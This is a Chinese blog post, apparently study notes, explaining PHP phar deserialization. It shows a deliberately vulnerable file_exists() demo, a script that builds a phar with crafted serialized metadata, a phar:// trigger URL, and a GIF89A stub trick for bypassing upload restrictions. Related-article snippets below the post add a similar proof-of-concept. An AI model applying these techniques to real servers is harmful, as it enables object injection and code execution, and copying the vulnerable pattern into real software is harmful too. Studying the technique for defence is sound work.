phar反序列化

已于 2022-10-14 17:53:18 修改
阅读量137 收藏
点赞数
文章标签: php
于 2022-10-14 16:34:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/127323276
版权

https://blog.csdn.net/xiaolong22333/article/details/116092578

phar简单的利用,新建一个demo.php的文件

<?php
class TestObject{
    public $name;
    function __destruct()
{
echo $this->name;
}
}
if($_GET['file']){
    file_exists($_GET['file']);
}

新建phar.php

<?php
class TestObject{

}
$p = new TestObject();
$p->name='hello';
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

访问phar.php生成新的test.phar文件
在这里插入图片描述
访问http://www.d.com/demo.php?file=phar://test.phar
就会触发phar反序列化
这是因为file_exists函数会触发phar反序列化

利用phar反序列化绕过文件上传案例
在这里插入图片描述
https://www.4hou.com/posts/5L38
运行这段代码,再把生成的test.phar后缀改为

<?php
class TestObject{

}
$p = new TestObject();
$p->name='hello';
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89A"."<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

gif就可以绕过限制上传

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 反序列化函数_利用phar协议造成php反序列化
weixin_39843986的博客
01-21 406
0x00前言在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了0x01 构造有反序列化payload的phar文件首先,phar是一种php语言的文件的后缀,所以生成phar文件...
PHPphar反序列化
errorr0
03-14 1704
一个不需要unserialize也能反序列化的漏洞
学习phar反序列化(看不懂别忍着,直接喷)
一剑开天门!的博客
01-13 157
学习phar反序列化(看不懂别忍着,直接喷)
ThinkPHPV5.1.25中使用file_exists等函数没有触发phar://的反序列化的destruct魔术方法执行的问题
听香水榭
08-21 313
因为像我碰到的问题就是我的项目主目录下的/runtime目录没有Web服务器用户的写入权限会导致日志写入失败报错:think\exception\ErrorException: mkdir(): 权限不够。导致后续代码不会执行,因此反序列化生成的对象就无法调用destruct魔术方法,当把吸入权限补上之后就OK了。在thinkphp框架中目标对象的wakeup魔术方法是会执行的,但是destruct魔术方法不一定会。
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
虽然`file_get_contents`和`file_put_contents`可以触发文件操作,但由于路径控制有限,它们不能直接用于Phar反序列化攻击。然而,通过全局搜索`is_dir`函数,作者发现了`scanFilesForTree`方法,其中的`$dir`变量是...
Laravel8反序列化POP链分析挖掘 .pdf
09-05
在Laravel 8中,作者提到了CVE-2021-3129,这是一个在Debug模式下可能导致任意代码执行的漏洞,它涉及到Phar反序列化。然而,随着框架版本的升级,Laravel对某些类添加了`__wake`方法以限制反序列化,这使得传统的...
对ShirneCMS的一次审计思路1
08-03
为了利用PHAR反序列化,我们需要`phar://`协议的URL。由于正常输入IP地址会被`count($paths)==3`限制,我们可以通过十六进制绕过这个限制。例如,将IPv4地址转换为十六进制,然后在URL中使用`0x`前缀。此外,还需要...
serp-scraper:一个库,用于提取,序列化和存储在搜索引擎结果页上抓取的数据
05-19
php composer.phar install支持的搜索引擎谷歌ing 问雅虎支持的序列化格式JSON格式XML格式YAML法律免责声明在任何情况下,我均不承担任何因用户使用或滥用本软件引起的或与之有关的直接,间接,偶然,结果,特殊或...
php伪装文件名_攻击者是如何将PHP Phar包伪装成图像以绕过文件类型检测的(推荐)...
weixin_42510805的博客
03-08 260
在US BlackHat 2018大会上,安全人员证明,攻击者不仅可以利用PHAR包发动RCE攻击,而且,通过调整其二进制内容,他们还可以将其伪装成一幅图像,从而绕过安全检查。在本文中,我们来看看第二点是如何做到的。背景知识在US BlackHat 2018大会期间,Sam Thomas召开了一个关于在PHP中利用 phar:// 流包装器来实现针对服务器的代码执行攻击的研讨会( 幻灯片)。在运行...
php phar 文件使用,详解PHPphar协议对象注入技术,反序列化操作快速入门!
weixin_39843986的博客
03-10 387
原标题:详解PHPphar协议对象注入技术,反序列化操作快速入门!近日,在BlackHat 2018大会上公布了一种针对PHP应用程序的全新攻击技术。来自Secarma的安全研究员Sam Thomas分享了议题“It’s a PHP unserialization vulnerability Jim, but not as we know it”,利用phar文件会以序列化的形式存储用户自定义的m...
PHP反序列化入门之phar
weixin_44304686的博客
06-12 547
原文链接:https://mochazz.github.io/2019/02/02/PHP反序列化入门之phar/ phar介绍 简单来说phar就是php压缩文档。它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// php://等类似,也是一种流包装器。 phar结构由 4 部分组成 stub phar 文件标识,格式为 xxx<?php x...
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
Phar反序列化
weixin_63231007的博客
06-06 1585
phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本>=5.3时默认开启支持PHAR文件的。phar文件默认状态是只读,使用phar文件不需要任何的配置。而phar://伪协议即PHP归档,用来解析phar文件内容。生成、使用phar文件php.ini中需要设置 phar.readonly=off 生成特殊的phar文件,使代码运行第六行,打印flag phar文件中的metadata以序列化形式存储,解析phar文件时会进行反序列化操作。
phar反序列化小结
Lethe's Blog
11-13 3024
0x00 phar反序列化 phar反序列化即在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。 关于其他反序列化的总结,可以看我的这篇文章 0x01 原理 首先了解一下phar文件的结构,一个phar文件由四部分构成: a stub:可以理解为一个标志,格式为xxx<...
phar反序列化的简单总结
m0_62422842的博客
04-22 706
前言 一般我们在做题时,看到代码中有serialize函数或者unserialize函数,我们肯定会想到php反序列化,那如果代码中没有这两个函数,它0是不是也能进行反序列化? 来自Secarma的安全研究员Sam Thomas发现了一种新的漏洞利用方式—phar反序列化。不用serialize函数就能进行序列化操作,这其实就跟phar://伪协议和phar 文件的打包机制有关。 什么是phar 它就是一种php程序的一种打包文件,类似与java中的jar文件,无需解压,直接通过phar://伪协
mysql 反序列化函数_phar反序列化
weixin_42529544的博客
01-21 1002
phar反序列化前段时间纵横杯遇到一题反序列化,当时队友做出来了,赛后尝试复现一下,并总结反序列化内容phar的本质是一种压缩文件,会以序列化的形式存储用户自定义的meta-dataPhar文件结构stub:phar文件标识,以 __HALT_COMPILER();?>结尾manifest:压缩文件的属性等信息,以序列化的形式存储自定义的meta-datacontents:压缩文件的内容si...
phar反序列化poc
最新发布
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值